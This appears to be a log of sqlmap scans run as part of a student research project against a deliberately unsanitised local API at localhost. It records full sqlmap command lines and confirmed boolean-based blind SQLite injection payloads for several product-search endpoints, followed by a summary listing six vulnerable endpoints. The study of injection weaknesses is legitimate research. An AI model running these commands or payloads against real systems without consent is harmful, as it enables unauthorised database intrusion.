   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [,]     | .'| . |
  |___|_  [,]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:49 /2026-05-31/
  
  [22:33:49] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:49] [INFO] loading tamper module 'space2comment'
  [22:33:49] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:49] [INFO] testing connection to the target URL
  [22:33:49] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:49] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:49] [INFO] testing if the target URL content is stable
  [22:33:50] [INFO] target URL content is stable
  [22:33:50] [INFO] testing if GET parameter 'nome' is dynamic
  [22:33:50] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:33:50] [INFO] heuristic (basic) test shows that GET parameter 'nome' might be injectable (possible DBMS: 'SQLite')
  [22:33:50] [INFO] testing for SQL injection on GET parameter 'nome'
  it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (1) and risk (1) values? [Y/n] Y
  [22:33:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:50] [INFO] testing 'Generic inline queries'
  [22:33:50] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
  [22:33:50] [INFO] GET parameter 'nome' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
  [22:33:50] [INFO] testing 'SQLite inline queries'
  [22:33:50] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
  [22:33:50] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
  [22:33:50] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
  [22:33:50] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
  [22:33:50] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
  [22:33:50] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
  [22:33:50] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
  [22:33:50] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
  [22:33:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  [22:33:50] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: boolean-based blind
      Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
      Payload: nome=teste' AND CASE WHEN 9696=9696 THEN 9696 ELSE JSON(CHAR(89,73,71,75)) END-- ibGl
  ---
  [22:33:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:33:50] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:33:50] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 13 times
  [22:33:50] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:33:50 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[11/12] Testando: produtos_busca_categoria
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por categoria
  Params:    categoria=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?categoria=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_categoria
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:51 /2026-05-31/
  
  [22:33:51] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:51] [INFO] loading tamper module 'space2comment'
  [22:33:51] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:51] [INFO] flushing session file
  [22:33:51] [INFO] testing connection to the target URL
  [22:33:51] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:51] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:51] [INFO] testing if the target URL content is stable
  [22:33:52] [INFO] target URL content is stable
  [22:33:52] [INFO] testing if GET parameter 'categoria' is dynamic
  [22:33:52] [WARNING] GET parameter 'categoria' does not appear to be dynamic
  [22:33:52] [INFO] heuristic (basic) test shows that GET parameter 'categoria' might be injectable (possible DBMS: 'SQLite')
  [22:33:52] [INFO] testing for SQL injection on GET parameter 'categoria'
  it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (1) and risk (1) values? [Y/n] Y
  [22:33:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:52] [INFO] testing 'Generic inline queries'
  [22:33:52] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
  [22:33:52] [INFO] GET parameter 'categoria' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
  [22:33:52] [INFO] testing 'SQLite inline queries'
  [22:33:52] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
  [22:33:52] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
  [22:33:52] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
  [22:33:52] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
  [22:33:52] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
  [22:33:52] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
  [22:33:52] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
  [22:33:52] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
  [22:33:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  [22:33:52] [INFO] checking if the injection point on GET parameter 'categoria' is a false positive
  GET parameter 'categoria' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
  ---
  Parameter: categoria (GET)
      Type: boolean-based blind
      Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
      Payload: categoria=teste' AND CASE WHEN 1777=1777 THEN 1777 ELSE JSON(CHAR(79,119,106,118)) END-- vpjN
  ---
  [22:33:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:33:52] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:33:52] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 13 times
  [22:33:52] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:33:52 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[12/12] Testando: produtos_busca_nome_categoria
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por nome e categoria
  Params:    nome=teste&categoria=eletronicos
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?nome=teste&categoria=eletronicos"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_nome_categoria
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [)]     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:53 /2026-05-31/
  
  [22:33:53] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:53] [INFO] loading tamper module 'space2comment'
  [22:33:53] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:53] [INFO] flushing session file
  [22:33:53] [INFO] testing connection to the target URL
  [22:33:53] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:53] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:53] [INFO] testing if the target URL content is stable
  [22:33:53] [INFO] target URL content is stable
  [22:33:53] [INFO] testing if GET parameter 'nome' is dynamic
  [22:33:53] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:33:53] [INFO] heuristic (basic) test shows that GET parameter 'nome' might be injectable (possible DBMS: 'SQLite')
  [22:33:53] [INFO] testing for SQL injection on GET parameter 'nome'
  it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (1) and risk (1) values? [Y/n] Y
  [22:33:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:54] [INFO] testing 'Generic inline queries'
  [22:33:54] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
  [22:33:54] [INFO] GET parameter 'nome' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
  [22:33:54] [INFO] testing 'SQLite inline queries'
  [22:33:54] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
  [22:33:54] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
  [22:33:54] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
  [22:33:54] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
  [22:33:54] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
  [22:33:54] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
  [22:33:54] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
  [22:33:54] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
  [22:33:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  [22:33:54] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: boolean-based blind
      Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
      Payload: nome=teste' AND CASE WHEN 9424=9424 THEN 9424 ELSE JSON(CHAR(90,105,99,104)) END-- KKMN&categoria=eletronicos
  ---
  [22:33:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:33:54] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:33:54] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 13 times
  [22:33:54] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:33:54 /2026-05-31/
  
  
  
  --- Fim da saída ---


================================================================================
  RESUMO - sem_framework_sem_orm_sem_sanitizacao
================================================================================
  Configuração:                SEM FRAMEWORK | SEM ORM | SEM SANITIZACAO
  Total de endpoints testados: 12
  Vulnerabilidades encontradas: 6
  Erros durante execução:       0

  ENDPOINTS VULNERÁVEIS:
    - [GET] /usuarios (usuarios_listar)
      -> SQL Injection confirmada
    - [GET] /usuarios/busca/ (usuarios_busca_nome)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos (produtos_listar)
      -> SQL Injection confirmada
    - [GET] /produtos/busca/ (produtos_busca_nome)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos/busca/ (produtos_busca_categoria)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos/busca/ (produtos_busca_nome_categoria)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado

  Log salvo em: C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\resultado_20260531_223337.txt
  Saídas sqlmap em: C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output
================================================================================
